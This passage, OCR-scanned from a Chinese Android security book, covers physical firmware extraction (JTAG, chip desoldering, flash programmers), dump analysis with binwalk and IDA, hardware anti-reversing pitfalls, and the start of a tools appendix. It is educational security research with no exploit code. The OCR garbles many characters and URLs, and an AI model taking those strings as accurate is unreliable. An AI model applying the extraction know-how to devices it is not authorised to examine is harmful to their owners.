果 这 些 存储 设备 使 用 了 可 挂 载 的 文件 系统 , 只 需 将 它们 拔 出 来 然后 挂 载 到 计算 机 上 即 可 .有 时 候 ， 
般 入 式 开发 者 会 直接 写 人 原始 数据 ， 或 者 用 其 自 定义 的 格式 将 数据 存储 在 卡 上 。MicroSD 卡 和 
SD 卡 使 用 的 都 是 SPI， 因 此 可 以 将 上 面 介绍 的 SPI EEPROM 读 写 技术 用 在 这 里 。 

3. JTAG 和 调试 器 
使 用 JTAG 调试 口 和 调试 器 可 以 查看 处 理 器 寄存 器 的 内 容 ， 还 能 查看 内 存 里 的 数据 。 对 于 租 
人 和信 式 系统 来 说 ， 尤 其 是 那些 运行 裸 机 执行 文件 的 系统 ， 这 也 意味 着 可 以 从 中 提取 固件 。 这 也 是 
JTAG 调试 能 力 极其 重要 的 男 一 个 原因 。 包 括 Segger J-Link 在 内 的 许多 工具 ， 都 通过 JTAG 的 这 
一 功能 在 计算 机 中 重 构 固 件 镜像 。 使 用 J-Link 时 ，GDB 的 memory dump 命令 就 利用 了 GDB 服 
务 端的 这 个 功能 ， 将 整个 内 存 的 内 容 全 部 dump 出 来 。 


13.4.2 ”有 损 地 获取 固件 


如 果 前 面 提 到 的 无 损 方法 都 不 奏效 ， 就 要 考虑 其 他 可 能 损坏 设备 的 技术 了 。 

移 除 芯 片 

最 明显 也 最 具 破 坏 性 的 方法 是 将 芯片 从 板 上 物理 性 地 移 除 ， 然 后 通过 读 取 来 获得 固件 镜像 。 
乍 一 看 这 个 方法 似乎 很 费劲 ， 并 且 需 要 高 超 的 技术 ， 其 实 不 然 。 

移 除 一 个 表面 贴 装 器 件 (SMD ) 的 焊锡 然后 读 取 其 内 容 ， 是 一 件 非常 容易 而 且 有 趣 的 事情 。 
有 人 使 用 热风 枪 ( 其 实 就 是 电 吹风 机 ) 同时 加 热 PCB 上 某 个 SMD 模块 的 所 有 连接 焊 脚 , 使 其 焊 
锡 融 化 。 这 是 一 种 非常 直观 有 效 的 方法 。 

另 一 种 技术 是 使 用 叫 作 Chip Quik 的 产品 。 图 13-40 展示 了 使 用 它 时 所 有 需要 的 东西 。 

Chip Quik 主要 由 一 种 合金 金属 组 成 , 燃点 比 传统 的 焊锡 还 要 低 。 把 融化 了 的 Chip Quik 引 到 
冷却 坚固 的 焊锡 上 ， 可 以 将 热量 传递 给 焊锡 直至 其 融化 。 由 于 Chip Quik 保持 融化 状态 的 时 间 更 
长 一 些 ， 因 此 有 足够 的 时 间 将 去 掉 焊 锡 的 芯片 从 PCB 板 上 取出 来 。 即 使 害怕 焊接 ， 也 可 以 利用 
Chip Quik 的 策 方 法 取得 成 功 。 在 网 上 可 以 找到 许多 演示 整个 移 除 过 程 的 视频 。 
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图 13-40 ”Chip Quik 套件 


将 目标 CPU 或 者 闪存 芯片 从 板 上 移 除 下 来 以 后 , 接 下 来 做 什么 ?好 消息 是 , 有 一 家 叫 Xeltek 
的 公司 生产 了 一 系列 很 有 用 的 设备 来 完成 下 一 步 : 读 取 芯片 数据 。Xeltek 提供 了 许多 名 为 “通用 
闪存 编程 器 ”( Universal Flash Programmers ) 的 设备 ， 其 中 最 好 的 是 SuperPro 系列 。SuperPro 设 
备 可 以 读 写 数 百 种 不 同类 型 的 闪存 和 处 理 器 。 图 13-41 就 是 一 个 这 样 的 设备 ， 型 号 是 Xeltek 
SuperPro 9000E 。 





图 13-41 Xeltek SuperPro 5000E 


此 外 ，Xeltek 还 生产 了 数 百 种 适配器 ， 用 于 匹配 所 有 它 能 处 理 芯 片 的 格式 和 形状 系数 。 图 
13-42 中 是 用 于 SuperPro 5000E 的 一 些 适 配器 。 
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图 13-42 Xeltek SuperPro 5000E 及 其 适配器 








Xeltek 的 网 站 甚至 提供 了 一 个 可 供 搜 索 的 数据 库 ， 输 入 芯片 的 序列 号 就 能 搜 到 应 该 用 哪个 
Xeltek 适配器 来 匹配 该 芯片 。Xeltek 设备 通过 USB 线 连接 到 计算 机 , 并 配 有 简单 易 用 的 客户 端 软 


件 。 直 接 启 动 这 个 软件 ， 





























会 检测 到 正在 使 用 的 适配器 类 型 ， 并 询问 是 否 读 取 。 点 击 Read 并 等 待 


几 分 钟 ， 计 算 机 上 就 会 出 现 一 个 二 进 制 文件 ， 其 中 就 是 芯片 的 内 容 ! 图 13-43 是 这 个 工具 运行 时 
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Bufer 
Operation Option | 


Progran 
Read 


Verify 


Success: 


Failure: 
Totat 





rash 100000Me+OTP 200H3 100Pns 





Buffer clear 
园 Buffer clear on data load 
Buffer save when exit 


at IC Change 


ddress: 00000000H 


Frecksum: 05653c9B8 


UFFer range: 00000000H -~ 000FEFEEH 





Locate | [Copy || rill [Search |[ Search Next | Radix || svap | 














[Ne 人 tm/ 


Duplicate 














Count down: 
Count Totat 
Remains: 


Disapled 


[cancel] 





从 芯片 中 提取 出 固件 就 是 这 么 简 





图 13-43 ”Xeltek 读 取 固件 


单 ,不 过 Xeltek 的 设备 和 Total Phase 的 高 级 USB 工具 一 样 ， Ee 
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价格 达 几 千 美 元 。 如 果 不 是 公司 使 用 ， 对 个 人 来 说 实在 是 太 昂贵 了 。 当 然 ， 它们 也 确实 相当 有 效 
和 易 用 。 


13.4.3” 拿 到 dump 文件 后 怎么 做 


如 果 用 前 面 介绍 的 技术 从 设备 中 提取 出 了 一 个 很 大 的 二 进 制 文件 , 接 下 来 该 做 什么 ?怎么 找 
到 你 想 找 的 东西 ? 这 个 二 进 制 文件 就 是 固件 吗 ? 还 是 包含 了 其 他 的 数据 ? 

1. 裸 机 执行 文件 镜像 

如 前 所 述 , 微 控制 器 在 启动 时 不 管 指向 哪里 都 会 盲目 地 执行 。 调试 目标 的 规格 说 明 书 会 告诉 
我 们 处 理 需 整个 启动 过 程 的 细节 ,包括 人 口 点 的 位 置 ， 寄 存 器 的 初始 状态 ， 等 等 。 但 是 你 可 能 只 
是 想 快 速 定位 自己 要 找 的 东西 。 有 时 候 需 要 用 十 六 进 制 编辑 器 打开 整个 文件 , 找 出 线索 来 判断 这 
个 巨大 的 二 进 制 包 到 底 是 什么 。 

许多 时 候 ， 提 取出 的 镜像 文件 并 不 仅仅 是 固件 ,可 能 还 包含 了 一 个 轻 量 级 的 文件 系统 ， 比 如 
CramFS 、JFFS2 或 者 Yaffs2 文件 系统 。 如 果 这 个 数据 是 从 NAND 闪存 中 提取 出 来 的 ， 这 些 二 进 
制 镜像 就 可 能 全 部 是 文件 系统 。binwalk 这 样 的 工具 可 以 检测 三 进 制 镜像 中 的 内 容 并 输出 一 些 
有 用 的 信息 。binwalk 使 用 启发 式 方法 来 定位 文件 中 的 可 识别 结构 ， 下 面 是 一 个 例子 : 


[s7ephen@xip ~]$ binwalk libc.so 
/var/folders/jb/dlpdf3nslslblcddnxs7glsc0000gn/T/tmpzP9ukC, 734: 
Warning: New continuation level 2 is more than one larger than current 






















































































level 0 

DECIMAL HEX DESCRIPTION 

| 0x0 ELF 32-bit LSB shared object, ARM, 
version 1 (SYSV) 

271928 0x42638 CramFS filesystem, little endian 


size 4278867 hole_support CRC 0x2f74656b, edition 1886351984, 
2037674597 blocks, 1919251295 files 


这 个 简单 的 例子 用 binwalk 扫描 了 一 个 从 Android 设备 中 提取 出 来 的 libc.so 文件 。 可 以 看 
到 ， 它 正确 地 识别 出 这 是 一 个 ELF 格式 文件 ， 并 且 怀 疑 在 文件 尾部 存在 一 个 微小 的 CramFS 文 
件 系 统 。 

binwalk 不 是 银 弹 ， 在 识别 二 进 制 文件 内 容 时 经 党 失败。 如 果 镜 像 是 从 CPU (尤其 是 集成 
闪存 的 CPU ) 或 者 NAND 中 提取 出 来 的 , 这 种 情况 会 更 加 和 常见。 下面 的 例子 用 binwalk 来 识别 
一 个 提取 出 的 固件 镜像 : 
s7ephen@xip ~]$ 
s7s-macbook-pro:firmware_capture s7s$ ls -alt Stm32_firmware.bin 
-rwxrwxrwx 1 s7 staff 1048576 Mar 14 2013 Stm32_firmware.bin 
s7ephen@xip ~]$ binwalk Stm32_firmware.bin 
/var/folders/jb/dlpdf3nslslblcddnxs7glsc0000gn/T/tmprDZue9, 734: 
Warning: New continuation level 2 is more than one larger than current 


level 0 
DECIMAL HEX DESCRIPTION 
































s7ephen@xip ~]$ 
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在 这 个 例子 中 ， 面 对 一 个 从 STM32 微 处 理 器 中 提取 出 的 1MB 的 二 进 制 镜 像 ，binwalk 没 
能 识别 出 任何 东西 。 这 种 时 候 除 了 人 工 查看 镜像 以 外 ， 就 几乎 没有 别 的 什么 方法 了 。 

2. 导入 IDA 
如 果 已 经 充分 了 解 二 进 制 镜像 的 格式 、 足 以 将 其 中 没 用 的 字 节 全 部 剔除 , 或 者 用 其 他 办 法 得 
到 要 分 析 的 可 执行 代码 ， 接 下 来 就 可 以 把 它 导 入 IDA 了 。 将 来 自 庶 入 式 系统 的 二 进 制 镜像 导 和 人 
IDA 通常 需要 一 些 额 外 的 操作 , 不 像 分 析 ELF、Mach-O 和 PE 文件 时 那么 直接 简单 。 换 个 角度 说 ， 
IDA 提供 了 许多 额外 的 功能 来 协助 逆向 工程 师 加 载 和 解析 固件 镜像 。 
将 固件 镜像 加 载 到 IDA 中 通常 需要 三 步 。 第 一 步 是 用 IDA 打开 文件 ， 选 择 Binary File 或 者 
Dump File， 如 图 13-44 所 示 。 
































留 INew disassembly database 回回 加 | 





Windows | DOS | Unix | Mac | Java | NET | YariousOS's 
PDAstHandhel s | Consoles | Embedded | Varousfies 
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5 
Unknown File 加 






































图 13-44 在 IDA 中 选择 二 进 制 文件 


接 下 来 ， 在 对 话 框 中 选择 目标 文件 的 体系 结构 ， 如 图 13-45 所 示 。 需 要 预先 知道 待 分析 处 理 
器 的 架构 ， 并 且 在 这 里 选择 它 〈 或 者 最 接近 的 一 个 )。 


Binary/Raw File file loading Wizard 














Processor Selection 
With which processormodule would you like IDA to analyze the inputfile? 








ARM processors: 和 RM 

点 RM processors: 上 RM710a 
大 RM processors:ARMB 
ARM processors:xScaleB 
ARM processors:xScaleL 
Alpha series: alphab 

Alpha series: alphal 

Analog Devices ADSP 218x ad218x 
Angstrem KR1878: kr1878 
Atmel AYR series: avr 
Atmel OAK DSP: oakdsp 
DEC series: PDP11 

Fujitsu FEMC: FEMC16L 
Fujitsu FEMGC: F2MC16LX 
Fujitsu FR 32-Bit Family: fr 




















<Back | Next> | Cancel 








图 13-45 在 IDA 中 选择 处 理 器 架构 
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最 后 ， 在 如 图 13-46 所 示 的 表单 中 填写 目标 文件 的 各 类 信息 。 通 过 这 个 对 话 框 ，IDA 可 以 得 
知 该 二 进 制 文件 的 入 口 点 地 址 。 这 里 所 需 的 信息 可 以 从 目标 处 理 器 的 规格 说 明 书 中 获得 。 

















Disassembly memory organization 


FRAM 
回 ]Create RAM section 








PFAM start address Dx00000000 








PRAM size 0x00000000 








FROM 
Create ROM section 








ROM start address 0xFFC00000 








ROM size 0x002E2030 








FInput file 








Loading address 0xFFC00000 








File offset 0x00000000 














Loading size Dx002E2030 

















Additional binary files can be loaded into the database 
using the "File, Load file, Addtional binary file" command. 


| OK | Cancel 








图 13-46 在 IDA 中 指定 加 载 地 址 


如 果 运 气 好 ，IDA 此 时 就 会 顺利 加 载 这 个 二 进 制 文件 。 用 IDA 来 逆向 PE、ELF 或 Mach-O 
文件 时 ， 它 会 自动 进行 FLIRT (快速 库 定 位 与 识别 技术 ) 分 析 ， 只 有 出 错时 ( 比如 入 口 点 反 汇 编 
失败 或 者 识别 结构 出 错 ) 才 会 弹出 对 话 框 ， 让 我 们 意识 到 这 个 分 析 的 存在 。 它 在 逆向 固件 时 不 会 
有 什么 反应 。 如 图 13-47 所 示 ， 可 以 在 工具 栏 上 选择 花 条 形状 的 图 标 来 访问 FLIRT 对 话 框 
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打开 签名 窗口 (快捷 点 Shift+F5) 
图 13-47 IDA FLIRT 签名 识别 的 工具 栏 图 标 






































FLIRT 和 binwalk 的 工作 原理 类 似 ， eh 寺 征 。 找 到 以 后 ， 可 以 将 其 用 到 该 
Rs 但 是 与 binwalk 识别 常见 文件 格式 和 文件 系统 不 同 ，FLIRT 的 特征 用 于 


只 别 生成 代码 的 编译 器 。 如 果 有 些 FLIRT 特征 与 国 件 相 匹配 , 就 会 弹出 如 图 13-48 所 示 的 对 话 框 ， 
> 供 选 择 正确 的 签名 。 
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List of available library modules 


Library name 

"Canon A-Series Firmware" 

点 RM library big endian 

点 RM library litle endian 

Windows CE runtime & MFC for ARK 
Startups of PE files 

Primary FY a610e 





Cancel Help Search 











图 13-48 在 IDA 中 使 用 某 个 FLIRT 签名 


整个 过 程 可 能 不 太 完 美 , 但 是 在 网 上 有 不 少 成 功 案 例 (一 般 是 逆向 游戏 机 ROM )。 配置 IDA 
所 花费 的 时 间 可 能 会 稍微 超出 预期 。 即 使 这 个 二 进 制 文件 看 起 来 已 经 加 载 成 功 , 在 汇编 过 程 中 可 
能 还 需要 作 一 些 额 外 的 修复 。 尤 其 是 ARM 的 代码 ，IDA 会 在 函数 入口 点 识别 以 及 指令 模式 判断 
(ARM 还 是 THUMB ) 上 遇 到 困难 , 需要 进一步 改进 。 这 些 操作 可 以 手动 进行 , 也 可 以 写 一 个 IDC 
或 者 IDA Python 脚本 。 


13.5 ”陷阱 


基于 硬件 的 逆向 工程 和 漏洞 研究 会 让 人 受益 颇 丰 , 但 是 一 些 难以 解决 的 复杂 情况 也 会 让 人 诅 
来 。 这 里 列举 一 些 常 见 的 陷阱 。 












































13.5.1 ”定制 的 接口 


面 对 设 备 时 遇 到 的 最 耗 时 间 、 最 讨 大 的 情况 ,也许 是 一 个 看 起 来 具有 标准 引 脚 分 布 的 硬件 接 
口 其 实 是 定制 的 。 通 常情 况 下 ， 如 果 定 制 接口 在 PCB 上 的 位 置 很 靠近 主 处 理 器 ， 就 会 引起 我 们 
的 兴趣 。 跟 踪 这 些 接口 与 处 理 器 引 脚 之 间 的 连 线 可 以 得 到 许多 有 用 的 信息 。 例 如 ,如 果 跟 踪 到 许 
多 线路 都 连 上 了 用 于 USART (通用 同步 和 蜡 步 收发 器 ) 或 者 JTAG 的 引 脚 ， 就 可 以 推断 它们 是 
调试 接口 。 这 类 接口 也 经 常 出 现在 目标 处 理 吉 附近。 

然而 ,由 于 并 不 熟悉 这 些 接口 ,我 们 经 常 要 寻找 存疑 接口 的 交配 连接 器 并 破除 引 脚 ,将 其 变 
成 更 标准 的 接头 。 

一 家 名 为 SchmartBoard 的 公司 生产 了 数 百 种 小 板子 ， 用 于 对 奇怪 的 连接 需 和 表面 贴 装 元 件 
进行 破除 。 


13.5.2 “二进制 私有 数据 格式 


UART 、PC 和 SPI 这 样 的 标准 接口 通常 使 用 明文 数据 来 实现 交互 式 终端 、 系 统 引导 信息 和 调 
试 输出 等 。 但 是 总 线 也 会 使 用 私有 协议 , 尤其 是 当 系 统 运行 的 既 不 是 Linux 也 不 是 Android 时 ( 如 
RTOS )。 这 有 时 候 是 可 控 的 ， 比 如 完全 基于 ASCII 的 私有 协议 。 对 于 完全 基于 ASCII 的 协议 ,可 
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以 马上 判断 出 它 是 私有 的 , 因为 能 直接 看 到 其 中 的 文本 。 有 时 候 还 能 判断 出 一 些 循 环 字 符 是 协议 
中 的 定 界 符 或 者 用 于 格式 对 齐 〈 比如 在 浮 点 数 中 ) 的 字符 。 
然而 ， 有 时 总 线 上 传输 的 数据 全 部 是 二 进 制 的 。 此 时 很 难 确定 是 否 接 错 了 线 ， 也 不 确定 是 否 
弄 错 了 波 特 率 和 数据 编码 方法 。 这 种 情况 下 ,结合 其 他 方法 〈 比如 直接 访问 固件 ) 有 助 于 确定 这 
些 问 题 。 
如 果 在 组 件 之 间 的 总 线 上 观察 到 奇怪 的 数据 , 用 前 面 介绍 的 方法 嗅 探 并 编写 一 些 简单 的 协议 
应 答 来 答复 这 些 数据 会 很 有 帮助 ， 甚 至 有 可 能 找 出 bug。 






























































13.5.3 ”熔断 调试 接口 


防止 JTAG 调试 的 方法 有 很 多 ， 最 常见 的 是 JTAG 燃 丝 。 这 种 熔 丝 有 物理 的 〈 在 处 理 器 内 部 
物理 地 断 开 JTAG 线 )， 也 有 基于 软件 的 。 对 抗 这 两 种 保护 机 制 都 需要 一 些 高 级 的 技术 ， 超 出 了 
本 章 的 范围 .不 过 对 付 它 们 还 是 有 可 能 的 , 尤其 是 软件 熔 丝 。Ralph Phillip Weinmann 在 其 USENIX 
论文 “Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks” 中 
介绍 了 这 些 技术 ， 用 于 在 他 的 HTC Dream 手机 上 重新 启动 基带 处 理 需 的 JTAG 调试 。Kurt 
Rosenfeld 和 Ramesh Karri 也 写 过 一 篇 关于 JTAG 保护 机 制 的 深入 文章 ， 名 为 “JTAG: Attacks and 
Defenses”, 不 过 这 篇 文章 主要 针对 的 是 攻防 理论 。 此 外 ,在 一 些 开 发 者 论坛 里 , 还 可 以 找到 许多 
软件 熔 丝 相关 的 资源 。 























13.5.4 ”芯片 密码 


在 有 些微 处 理 器 厂商 生产 的 设备 中 ， 只 有 正确 输入 用 户 预先 指定 的 密码 才能 对 设备 进行 刷 
写 。 这 种 密码 通常 是 多 个 字 节 的 字符 串 表示 ， 会 被 发 送 到 忌 片 的 自 启 加 载 器 (bootstrap loader ) 
中 。 该 方法 可 以 防止 设备 被 刷 写 。 另 外 ,一 些微 处 理 器 厂商 的 芯片 只 有 配置 了 “物理 ”密码 ， 才 
能 启用 一 些 调试 功能 。 














13.5.5 ”bootloader 密码 、 热 键 和 哑 终 端 


一 些 bootloader ( 如 U-Boot ) 会 为 舰 入 式 开 发 者 提供 一 些 安全 选项 。U-Boot 中 有 几 个 这 样 的 
安全 特性 ， 开 发 者 可 以 通过 它们 将 U-Boot 输出 隐藏 起 来 ， 或 者 需要 输入 特殊 的 热 键 组 合 、 正 确 
密码 或 通过 UART 输入 一 串 特 殊 的 字 节 序列 ， 才 可 以 进入 交互 式 的 U-Boot 会 话 。 这 种 情况 越 来 
越 少见 ,因为 有 安全 意识 的 厂商 并 非 不 知道 这 种 方法 ,而 是 更 倾向 于 直接 将 UART 接口 隐藏 起 来 。 
通常 情况 下 , 同一 个 公司 的 固件 开发 和 硬件 设计 这 两 项 工作 是 分 开 进 行 的 ,甚至 可 能 被 转 包 出 去 。 
对 抗 这 些 保护 机 制 涉 及 一 些 超 出 本 文 范围 的 高 级 技术 。 

有 时 候 ,， 来 自 bootloader 和 操作 系统 的 引导 信息 是 可 见 的 , 但 是 之 后 连 线 就 变 得 沉默 了 ,或 
者 开始 喷 出 一 些 垃圾 信息 。 有 时 很 幸运 ,问题 只 是 由 不 常见 的 波 特 率 改 变 导致 ; 但 有 时 需要 附着 
到 一 个 定制 的 调试 接口 ,或 者 需要 一 个 驱动 程序 使 用 二 进 制 数据 将 调试 信息 传 给 监控 UART 接口 
的 定制 软件 。 
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13.5.6 已 定制 的 引导 过 程 


有 时 候 ， 我 们 很 开心 地 找到 并 连 上 了 UART 或 其 他 调试 输出 口 ， 观 察 到 bootloader 被 加 载 ， 
然后 引导 进 了 内 核 。 接 下 来 还 看 到 驱动 初始 化 , 然后 开始 摩拳擦掌 地 等 待 登录 提示 符 出 现 一 一 但 
是 它 到 最 后 都 没有 出 现 ， 为 什么 ? 

这 通常 是 由 于 Linux 或 者 Android 版 本 已 经 定制 过 了 ， 不 再 执行 登录 进程 。 许 多 时 候 ， 骨 入 
式 开 发 者 选择 在 引导 完成 后 直接 启动 其 核心 进程 。 这 类 软件 通常 会 通过 一 个 私有 的 协议 ( 经 常 是 
二 进 制 的 ) 与 定制 的 远程 控制 客户 端 或 者 调试 /诊断 客户 端 进行 通信 。 这 种 客户 端 在 PC 端 运行 ， 
通过 UART 与 设备 相连 。 

这 种 情况 下 ,虽然 无 法 得 到 登录 提示 符 , 但 是 可 以 试 试 别 的 方法 来 攻破 设备 。 比 如 说 ,也 许 
可 以 攻 入 bootloader 来 访问 到 固件 镜像 ; 或 者 通过 物理 访问 闪存 ， 得 到 文件 系统 镜像 的 副本 ， 然 
后 进一步 调查 。 如 果 这 些 简单 的 方法 还 不 奏效 ， 就 需要 其 他 方法 了 。 


13.5.7 未 暴露 的 地 址 线 


本 音 介 绍 过 ， 有 些 厂商 会 在 PCB 板 上 将 NAND 闪存 这 样 的 组 件 像 叭 三 明治 一样 放 在 微 处 理 
器 上 ， 从 而 节省 空间 ,也 就 是 所 谓 的 堆 倒 式 封装 结构 ( PoP )。 这 种 结构 不 仅 让 我 们 难以 识别 微 处 
理 器 的 序列 号 ， 还 会 带 来 男 一 类 问题 。 

如 果 闪 存 芯片 以 PoP 结构 覆盖 在 微 处 理 器 上 ,其 引 脚 就 不 再 暴露 出 来 了 。 事实 上 ， 连 引 脚 者 
没有 了 。 因此， 无 法 简单 地 通过 去 掉 焊锡 将 其 取 下 来 并 读 取 其 中 内 容 。 除 了 一 些 高 级 而 元 长 的 芯 
片 分 离 技术 , 唯一 的 办 法 就 是 通过 下 面 的 微 处 理 器 来 访问 上 层 内 存 的 内 容 。 如 果 这 个 微 处 理 器 没 
有 禁 掉 调试 功能 ， 就 还 有 可 能 。 但 是 如 果 连 JTAG 熔 丝 位 也 烧 断 了 ， 那 就 没什么 简单 的 方法 读 出 
里 面 的 数据 了 。 


13.5.8 ”防止 逆向 的 环 氧 树脂 


有 时 候 会 在 PCB 板 上 发 现 想 拆除 的 元 件 被 一 层 光滑 的 或 者 无 光泽 的 黑色 或 者 蓝 色 材料 所 覆 
盖 。 厂 商 这 么 做 ,可 能 是 为 了 保护 元 件 不 被 天 气 原因 或 者 冷凝 问题 影响 ; 但 更 可 能 的 原因 是 ,他 
们 就 是 想 阻止 其 他 人 轻易 地 用 探 针 连 接 到 元 件 上 或 者 去 掉 其 爆 锡 并 从 中 读 取 数据 。 这 种 问题 有 时 
候 用 弟 须 刀 或 剃 须 刀 加 热风 枪 组 合 就 能 搞定 。 

但 是 有 时 候 , 厂商 们 会 使 用 更 贵 的 、 混 合 了 硅化 合 物 的 环 氧 树脂 。 这 样 做 可 以 挫败 那些 试图 
用 化 学 溶剂 溶解 环 氧 树 脂 的 人 ， 因 为 可 以 溶解 这 些 硅 添加 剂 的 化 学 溶剂 也 会 溶解 掉 PCB 里 的 硅 
以 及 环 氧 树脂 要 保护 的 元 件 ， 这 样 就 会 彻底 损毁 设备 。 


13.5.9 ”镜像 加 密 、 混 淆 和 反 调 试 


我 们 没有 碰 到 过 几 个 采用 这 类 技术 的 消费 级 设备 。 对 PC 和 移动 恶意 代码 比较 熟悉 的 逆向 工 
程 师 们 看 到 这 个 标题 , 可 能 会 马上 联想 到 在 计算 机 恶意 软件 中 用 到 的 各 类 加 密 和 混淆 技术 ,比如 
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跳 转 加 无 效 代 码 、 运 行 时 反 混淆 等 。 在 舱 入 式 设备 中 ， 可 能 也 有 一 些 聪 明 的 定制 方法 ,即便 受到 
组 件 的 局 限 ， 依 然 可 以 做 到 这 些 。 但 这 个 情况 并 不 常见 ， 因 为 还 有 计算 空间 和 电力 的 限制 存在 。 

比如 说 , 加 密 裸 机 执行 文件 ,让 它 在 运行 起 来 以 后 解密 自身 ， 这 看 起 来 是 一 个 很 简单 的 解决 
方案 。 然 而 , 在 伐 入 式 系统 中 也 许 并 没有 足够 多 的 内 存 空间 来 加 载 整个 镜像 。 另 一 方面 ,内 存在 
每 一 次 写 人 时 ,寿命 都 会 有 衰减 , 因此 仍 人 式 开 发 者 一 般 都 避免 在 运行 时 对 闪存 进行 写 操作 。 如 
果 可 执行 文件 镜像 无 法 在 内 存 中 脱 壳 , 就 只 能 在 闪存 中 进行 自修 改 了 , 这 不 仅 导 致 设备 启动 过 程 
变 慢 ， 还 会 更 快 地 磨损 存储 媒介 。 



































13.6 小结 


本 章 旨 在 带领 没有 任何 相关 经 验 的 读者 了 解 如 何 通过 物理 访问 来 攻击 Android 设 备 这 样 的 内 
入 式 硬 件 。 我 们 介绍 了 髓 入 式 设备 中 经 常 暴 露出 来 的 各 类 接口 ， 包 括 UART、JTAG、PC、SPI、 
USB 和 SD 卡 。 接 下 来 ,介绍 了 如 何 识别 这 些 接口 并 与 其 进行 通信 。 通 过 这 些 接 口 ， 研 究 人 员 可 
以 对 目标 设备 有 更 深 的 理解 。 

对 硬件 进行 物理 攻击 的 一 个 主要 目标 是 进一步 发 现 、 设 计 和 实现 不 需要 物理 接触 的 攻击 。 我 
们 介绍 了 如 何 借助 一 系列 商业 工具 和 免费 工具 , 通过 访问 这 些 接口 来 读 取 设 备 中 的 固件 。 对 固件 
进行 道 向 和 深入 分 析 可 以 了 解 设备 的 工作 运转 原理 ， 进 而 有 可 能 找 出 其 中 存在 的 严重 漏洞 。 

最 后 , 讨论 了 在 实践 中 使 用 这 些 工具 和 技术 可 能 遇 到 的 各 类 陷阱 , 以 及 其 中 一 些 问 题 的 应 对 
之 道 。 










































































工 具 








附录 A 主要 介绍 对 Android 系 统 安全 研究 切实 有 效 并 且 可 以 公开 获取 的 工具 ,但 是 并 不 详尽 。 
比如 ,这 份 列表 没有 包含 本 书 中 我 们 自己 开发 的 工具 。 此 外 , 不 时 还 会 有 新 的 工具 被 创造 和 发 布 
出 来 。 


A.1 开发 工具 


本 方 介绍 的 大 部 分 工具 主要 用 于 开发 应 用 程序 ， 不 过 安全 研究 人 员 也 会 用 它们 来 开发 PoC 
程序 、 调 试 应 用 程序 或 者 编写 针对 Android 平台 的 漏洞 利用 代码 。 




















A.1.1 Android SDK 


Android 软件 开发 工具 包 (Software Development Kit，SDK ) 提供 了 一 系列 核心 开发 工具 、 
API 库 、 文 档 以 及 Android 应 用 程序 示例 。JDK (Java Development Kit )、Apache Ant 与 该 SDK 
都 是 构建 、 测 试 和 调试 Android 应 用 程序 所 必需 的 工具 。 

该 SDK 还 包括 一 个 基于 QEMU (Quick EMUlator ) 的 Android 模拟 器 。 开 发 者 可 以 直接 在 
这 个 模拟 器 中 测试 用 SDK 开发 出 来 的 应 用 程序 ， 并 不 需要 真实 的 Android 设备 。 

Android SDK 可 以 用 于 Linux .Mac OSX 和 Windows 平 台 , 下 载 地 址 是 :http:/developer.android. 
com/sdk/index.html。 























A.1.2 Android NDK 


Android 原生 开发 工具 包 (Native Development Kit，NDK ) 提供 了 使 用 C 和 C++ 开发 原生 应 
用 程序 所 需 的 一 切 。 该 NDK 包括 在 Linux、OSX 和 Windows 上 为 ARM、MIPS 和 x86 架构 交叉 编 
译 二 进 制 原生 代码 的 完整 工具 链 ， 下 载 地 址 是 : http:/developerandroid.comy/tools/sdkndlvindex.html。 






































A.1.3 Eclipse 


Eclipse 是 一 个 支持 多 种 语言 的 集成 开发 环境 (IDE )， 具 有 可 扩展 的 插件 系统 ， 文 持 各 种 特 
性 ， 如 版 本 控制 系统 、 代 码 调试 、UML 和 数据 库 浏览 器 。 从 Android SDK 的 早期 版 本 开始 ， 它 
就 是 官方 文 持 的 Android 开发 IDE。 下 载 地 址 是 : www.eclipse.org/。 
































376 附录 A 工具 





A.1.4 ADT 插件 








Android 提供 了 一 个 定制 的 Eclipse 插件 ， 名 为 ADT (Android Developer Tools ) 插件 。 它 可 
以 将 Eclipse 的 功能 扩展 得 更 加 适合 于 Android 开发 。 通过 这 个 插件 , 开发 者 可 以 创建 Android 项 
目 ， 使 用 图 形 界面 编辑 器 设计 Android 用 户 界面 ， 构 建 并 调试 开发 出 的 Android 应 用 程序 。ADT 
插件 的 下 载 地 址 是 : http://developer.android.com/sdk/installing/installing-adt.html。 






































A.1.5 ADT 软件 包 


ADT 软件 包 是 将 开发 者 创建 Android 应 用 程序 所 需 的 一 切 打包 并 提供 下 载 的 单一 文件 , 其 中 
包括 : 
口 集成 了 ADT 插件 的 Eclipse IDE 
口 包含 Android 模拟 器 和 DDMS 调试 工具 的 Android SDK 
口 包含 ADB 和 fastboot 工具 的 Android 平台 工 具 
口 用 于 模拟 器 的 最 新 Android 平台 SDK 包 和 系统 镜像 文件 
ADT 软件 包 的 下 载 地 址 是 : http://developer.android.com/sdk/installing/bundle.html。 






































A.1.6 Android Studio 


Android Studio 是 一 个 基于 IntelliJIDEA 的 IDE, 专门 针对 Android 开发 而 设计 。 本 书 编写 时 ， 
这 个 工具 还 是 早期 预览 版 本 ， 即 包含 一 些 bug 和 未 完成 的 特性 。 它 很 快 受 到 了 Android 开发 者 的 
欢迎 ,许多 人 正在 从 传统 的 Eclipse IDE 切换 到 这 个 工具 。Android Studio 详情 参见 . http://developer. 
android.com/sdk/installing/studio.html。 


A.2 固件 提取 和 刷机 工具 


进行 安全 研究 时 ， 经 常 需 要 将 不 同 版 本 的 固件 刷 入 Android 设备。 有 时 候 , 研究 人 员 还 需要 
将 一 台 设 备 从 无 法 启动 的 状态 中 恢复 , 此 时 就 需要 刷 入 一 个 官方 固件 镜像 文件 让 设备 恢复 到 正常 
的 操作 模式 。 设备 三 商 有 时 将 固件 用 私有 格式 打包 并 分 发 , 使 其 分 析 变 得 更 加 困难 。 如 果 知 道 格 
式 ， 通常 就 有 工具 能 够 从 中 提取 固件 的 原始 内 容 。 本 节 介 绍 这 些 提取 固件 和 刷机 的 常用 工具 。 






































A.2.1 Binwalk 


分 析 未 知 格式 的 固件 镜像 文件 时 ，Binwalk 是 必 不 可 少 的 工具 。 它 类 似 于 file 工具 , 但 是 
与 后 者 相 比 ， 它 会 遍历 整个 庞大 的 二 进 制 镜 像 文件 来 搜索 特征 字符 串 。Binwalk 支持 多 种 压缩 算 
法 ， 可 以 从 一 个 固件 包 中 提取 艇 入 的 存档 文件 和 文件 系统 镜像 文件 。 详 细 介绍 参见 主页 : 
http://binwalk.org/。 
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A.2.2 fastboot 


使 用 USB 将 Android 设 备 与 主机 连接 后 ,通过 fastboot 工具 及 其 协议 可 以 与 设备 的 bootloader 
